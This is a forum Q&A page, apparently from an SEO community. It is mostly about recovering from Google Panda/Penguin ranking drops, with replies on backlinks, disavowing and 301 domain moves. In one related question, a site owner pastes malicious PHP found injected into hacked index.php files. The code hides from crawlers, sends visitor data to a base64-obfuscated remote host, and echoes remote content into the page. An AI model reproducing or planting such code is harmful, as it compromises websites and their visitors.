Trying to escape a Google algorithmic ranking drop
-
In 2010 our website ranked number 1 for many keywords. A few years ago we saw a sudden crash, and we have since identified that we were hit by several flavours of the Panda and Penguin updates, mainly due to low-quality backlinks and poor content (some of it duplicated).
- Since then we have done a major overhaul of our backlink profile. We have recovered rankings that had fallen from number 1 to around 60-70 for many keywords; we are now placed at around positions 11 to 18.
- We have also addressed our duplicate content issues: we removed all duplicate content, introduced a blog with fresh bi-daily updates in an attempt to gain traffic, and amalgamated many small, low-quality pages into larger, higher-quality content pages.
- We are now mobile-friendly with a dynamic site, and our site speed score is good (around 80).
- We have switched to HTTPS and also upgraded our website for better conversions.
- We have reviewed the site's technical issues and don't have many major ones, although 404s do show up in Google Webmaster Tools for old pages we removed because of duplicate content (a minimal redirect sketch for these is included after the questions below).
- We are link building at a pace of around 40 mentions a month; some are nofollow, some dofollow, and some carry no link at all. We are diversifying anchors to include brand terms in addition to target keywords.
- We have pretty much exhausted every avenue we can think of, but we cannot break onto page 1 for any significant keyword we are targeting. Our competitors' websites are not that powerful, and their metrics are similar to ours, if not lower.
1. Please can you advise on anything else you think we should look at?
2. We are even considering moving to a new domain and 301-redirecting all pages to it in an attempt to shake off the algorithmic filters (penalties). Has anyone done this? If we 301 all URLs to a new domain, how long should we expect it to take to regain at least our current rankings? Do you think it's worth it? We know the risk of doing this, which is why we wanted to seek some advice.
3. On the other hand, we have considered that disavowing so many links (70%) could itself be a cause of the page-two problem; however, we are link building to Moz and Majestic metric standards with no benefit. Do you think we should increase link building?
Advice is appreciated!
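On the 404s mentioned above: rather than leaving the removed duplicate pages as 404s, the thinking is to point each old URL straight at the page it was merged into. A rough sketch of what that could look like, assuming an Apache setup (the paths below are placeholders for illustration, not our real URLs):

  # .htaccess sketch (Apache mod_alias) - placeholder paths, not real URLs
  # each removed duplicate URL points straight at the page it was merged into (one hop, no chains)
  Redirect 301 /old-duplicate-page-a.html /consolidated-guide/
  Redirect 301 /old-duplicate-page-b.html /consolidated-guide/
  # pages with no real replacement return 410 Gone instead of a plain 404
  Redirect gone /old-thin-page.html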
-
Hey There!
Sounds like you're doing a lot of things by the book and "right" on paper, but it's really tough to know for sure whether you're on the right track without seeing the site, an example of some of the links being built, the content, etc.
I say this because "40 links a month," for example, sounds like a nice number, but it also sounds suspect: that's a pretty sizable volume of links, which makes me wonder about their quality.
What I'd be curious about is: what has been done outside of SEO tactics and fixes? I'm thinking of social, audience building, brand building, design upgrades, content, adding value, etc. Also, what type of site is this, and how big is it?
The other thing that's tough to know is how well the technical changes were implemented. For example, switching to HTTPS, among other things, can create a lot of redirect chains. I would try to undo redirect chains and only do page-to-page redirects (instead of having chains of page -> page -> page -> page, etc.).
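As a rough illustration of what I mean (assuming an Apache setup, with example.com standing in for your canonical https hostname), the goal is for the old http and www variants to jump straight to the final https URL in a single hop rather than stepping through several intermediate redirects:

  # .htaccess sketch (Apache mod_rewrite) - example.com is a placeholder domain
  RewriteEngine On
  # any non-HTTPS or www request goes straight to the final https URL in one hop
  RewriteCond %{HTTPS} off [OR]
  RewriteCond %{HTTP_HOST} ^www\. [NC]
  RewriteRule ^(.*)$ https://example.com/$1 [R=301,L]

Then crawl the site afterwards to confirm each old URL resolves in a single 301 rather than a chain.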
And right, it's tough to know if your disavow is helping or hurting without knowing a lot of the specifics.
If it were me, I'd make sure you're focusing enough on other things besides SEO alone. That doesn't mean you'd ignore SEO when doing social, content, audience building, etc.; just that you're taking a more holistic view. I think Google definitely favors recovering sites that prove they are building something people want.
-
This has been a long struggle and has caused a massive traffic drop. Do you think we should switch to a new domain with 301 redirects?
-
If you ask me, you are doing everything right and you have to keep doing it. I remember doing the same for one of my clients: the rankings did improve, but they didn't really hit the first page for many of the real money-making keywords.
I think that once your website has been through a Google penalty, it takes longer than usual to regain Google's trust. If I were in your place, I would look into the past data and see how each Penguin and Panda update affected my traffic and rankings.
If rankings and traffic responded positively (and significantly), then you should continue what you are doing and wait for the next Penguin and Panda updates to be released. That way Google will look at your efforts again and give you back the rankings you deserve.
Also, my advice is to get links from the highest-authority websites that Google really trusts (if possible); this should also help big time.
Adding my two cents!
-
Related Questions
-
Does .me take more time to rank than .com?
Hi, our company website is about freight forwarding, and I'm worried about the .me extension that has been chosen. The location is Dubai, and the website is running Google Ads with a no-indexed landing page. My doubt is that our cargo company website, shipwaves.me, is not getting Google Ads attention because of that. The other confusion is whether shipwaves.me takes more time than a .com to rank for keywords with high search volume. I'm confused about why the company chose a .me extension. Does anybody know: is .me a top-level domain, and does it take longer to rank than a .com domain?
-
SEMrush vs GA: ranking drops since February and December 2018?
I am wondering if someone can help me understand what's going on with our site. In SEMrush we had a 50% drop in the number of keywords ranking from February 2018 to October. Looking at SEMrush, I am actually seeing a drop after 2/2018 for many competitors' sites as well. We saw moderate improvement in November, but around December 6th we started seeing a decline in the number of keywords ranking again. In Google Analytics there was a 10-15% drop in traffic after February 2018, which recovered from September to December, but since early December there is a drop again. In GWT, I am seeing something similar to Analytics with impressions and clicks. We have done some SEO over the past couple of years, but we have taken care to do things white-hat so as not to incur a penalty. We have also invested in writing content for our blog on a regular basis. Any thoughts?
-
Is the Google Penguin penalty automated or manual?
Hi, I have seen that some of our competitors are missing from the top SERPs and seem to be penalised according to this penalty checker: http://pixelgroove.com/serp/sandbox_checker/. Is this the right tool to check for a penalty, or are there other good tools available? Are these penalties because of the recent Penguin update? If so, is this an automated or a manual penalty from Google? I don't think all of these sites used black-hat techniques and got penalised. The new Penguin update might have flagged their backlinks, causing this penalty. Even we dropped over the last 2 weeks. What's the solution for this? How effective is a link audit? Thanks, Satish
-
How to remove this type of external link from Google
Hello, my website was hacked a few days ago. The hack has since been resolved, but it is still generating bad links, so I am disavowing them. However, it is generating links like this:
http://domain.com/a></p><h1>DIXCEL HS-typeスリットディ
I am not able to disavow them as-is because of the spacing and markup generated inside the URLs. So my question is: is there any way to remove this type of link from Google? If anybody knows, please let me know; I need to remove these as soon as possible. Please help, thank you.
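For reference, a disavow file that sidesteps the malformed URLs would look roughly like this (spam-domain.com is only a placeholder for the domain hosting the bad links, and the file still has to be uploaded through Google's disavow tool for the affected property):

  # disavow.txt sketch - spam-domain.com is a placeholder
  # a single malformed URL like the one above tends to be rejected by the tool,
  # so disavowing at the domain level avoids pasting the broken URL at all
  domain:spam-domain.com
-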
How does Google Treat 301 Redirects?
Hi, my website was one of many that dropped in rankings this last Friday. The company I outsourced my SEO to 4 months ago did a bad job. Now I'm doing everything myself to recover, so I was thinking of getting new hosting, duplicating the website with the same content (I have original, quality content), and 301-redirecting my old domain to the new one. How long can it take with Google? Can penalties be passed via 301 redirects? Looking forward to your help.
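For context, the kind of page-for-page move I have in mind would look roughly like this on an Apache setup (olddomain.com and newdomain.com are placeholders, not the real sites): every URL on the old domain 301s to the same path on the new one in a single hop.

  # .htaccess sketch on the OLD domain (Apache mod_rewrite) - placeholder domains
  RewriteEngine On
  # map every old URL to the identical path on the new domain, one hop
  RewriteCond %{HTTP_HOST} ^(www\.)?olddomain\.com$ [NC]
  RewriteRule ^(.*)$ https://www.newdomain.com/$1 [R=301,L]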
-
Website has been hacked: will this hurt rankings?
Today we found out that one of our websites has been hacked and that this code was placed in multiple index.php files:
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>
After some searching I found other people mentioning this problem too. They were also saying that it could have an impact on your search rankings. My first question: will this hurt my rankings? Second question: is there something I can do to tell the search engines about the hack so that we don't lose rankings because of it? Grtz, Ard
-
Why is this ranking first in Google Places for this term....?
"Best Bar In Chicago" - http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=best+bar+in+chicago They have only 5 Google reviews, and their local directory reviews are suspect. One of them goes to rateclubs.com and it's not even a page for their business, while one of them doesn't have user reviews, it's just an editorial review. The other one at superpages.com doesn't even link back to their site, it links to their restaurants.com profile. What is going on here? I've been trying to figure this out for a while as their first place ranking has been solidified for quite some time now. I can also tell you that a few of the bars listed below them have a MUCH higher profile and are better known. You can see that just by the reviews.
-
How much time do you think Google employees spend reverse engineering what we do?
Let's face it: reverse engineering sites to guess at what big G does is the cornerstone of SEO. It would just make sense that they do the same to learn all our tactics.